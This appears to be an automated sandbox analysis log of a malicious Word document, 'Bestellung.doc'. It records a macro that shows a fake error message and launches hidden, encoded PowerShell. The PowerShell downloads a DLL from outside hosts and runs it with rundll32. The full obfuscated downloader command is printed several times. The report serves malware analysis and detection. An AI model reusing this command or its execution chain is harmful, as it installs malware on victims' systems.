ABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2103436602.000000001B860000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: Bestellung.docStream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023100B push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020F090 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F057F push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00282D98 push 00282E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00290020 push 00290058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00284038 push 00284064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025A0B4 push 0025A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025A0B2 push 0025A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025B274 push 0025B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026C34C push 0026C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00290498 push 002904EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002904F4 push 0029055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002905B8 push 002905E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0028B588 push 0028B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00290580 push 002905ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002905F0 push 0029063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00290654 push 00290680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029068C push 002906B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025E696 push ecx; mov dword ptr [esp], edx
